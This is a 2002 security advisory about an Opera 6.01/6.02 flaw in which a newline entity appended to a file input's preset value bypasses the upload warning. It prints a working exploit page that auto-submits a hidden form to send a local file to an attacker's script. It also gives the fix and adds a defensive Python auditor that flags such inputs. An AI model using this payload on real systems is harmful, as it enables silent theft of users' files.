Opera permits unwanted local file upload
30th May 2002 [SBWID-5381]
COMMAND

	Opera permits unwanted local file upload

SYSTEMS AFFECTED

	Opera 6.01 on Windows platforms. Opera 6.02 on Windows platforms.

PROBLEM

	In GreyMagic Security Advisory GM#001-OP
	[http://sec.greymagic.com/adv/gm001-op/]
	

	Opera, like all browsers today, supports the <input type="file">
	element, which is a standard method for users to upload files to HTTP
	servers. Since the file element is a very security-sensitive element,
	most web browsers do not allow its "value" attribute to be set (read
	only). If it was possible to assign an arbitrary string to the
	"value" attribute, an attacking server could fetch any local file by
	simply submitting a form (through scripting or social engineering, if
	scripting has been disabled).
	

	Opera's approach to the file element is a little different. The
	"value" attribute can be set, but before the form it resides in is
	submitted, a dialog comes up with the following warning: "The files
	listed below have been selected, without your intervention, to be sent
	to another computer. Do you want to send these files?"
	

	 Discussion
	 ==========

	

	It is possible to bypass the file element's confirmation dialog, which
	means an attacker can download any file from an unsuspecting Opera
	user.
	

	By appending a simple "&#10;" (HTML entity, which represents the
	ASCII code for a new-line character) to the end of the file element's
	"value" attribute, Opera's security algorithm is fooled into thinking
	that no files were assigned. Therefore, the warning dialog doesn't
	come up; Opera simply submits the form with the desired file chosen by
	an attacker.
	

	Surprisingly, versions of Opera prior to 6.01 are not vulnerable to
	this attack. So a change that occurred between version 6.0 and 6.01 is
	the culprit. This also means that all of the non-Windows versions are
	safe (Opera has not yet released 6.01 for other platforms).
	

	 Exploit
	 =======

	

	This exploit will automatically transfer the file "c:/test.txt" to an
	attacking host, which can handle it using a server-side environment
	such as ASP, PHP or other solutions. It does not require any user
	interaction:
	

	

	<body onload="document.secForm.submit()">
	<form method="post" enctype="multipart/form-data" action="recFile.php" name="secForm">
	<input type="file" name="expFile" value="c:\test.txt&#10;" style="visibility:hidden">
	</form>
	</body>

	

SOLUTION

	Upgrade to version 6.03
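
	An added example, not part of the GreyMagic advisory: a Python audit
	for a content filter or page review that flags any file input whose
	"value" attribute is preset, and notes when the decoded value ends in
	a control character as described above. The two sample pages are
	constructed, and audit_html and the reason labels are names chosen
	for this example.

```python
from html.parser import HTMLParser

# Constructed sample pages: a normal upload form, and one that presets the
# file path and ends it with a newline entity (the pattern in the advisory).
BENIGN = ('<form method="post" enctype="multipart/form-data">'
          '<input type="file" name="doc"></form>')
SUSPECT = ('<form method="post" enctype="multipart/form-data" action="recFile.php">'
           '<input type="file" name="expFile" value="c:\\test.txt&#10;"></form>')


class FileInputAuditor(HTMLParser):
    """Collect <input type=file> elements that arrive with a preset value."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "input":
            return
        # html.parser has already decoded character references such as &#10;
        attr = {name: (value or "") for name, value in attrs}
        if attr.get("type", "").strip().lower() != "file":
            return
        value = attr.get("value", "")
        if not value:
            return  # normal case: the user chooses the file interactively
        reasons = ["preset-value"]
        if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in value):
            reasons.append("control-char")
        if value != value.rstrip():
            reasons.append("trailing-whitespace")
        self.findings.append({"name": attr.get("name", ""), "value": value,
                              "line": self.getpos()[0], "reasons": reasons})


def audit_html(markup):
    """Return one finding per file input that carries a preset value."""
    auditor = FileInputAuditor()
    auditor.feed(markup)
    auditor.close()
    return auditor.findings


if __name__ == "__main__":
    for label, page in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, audit_html(page))
```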
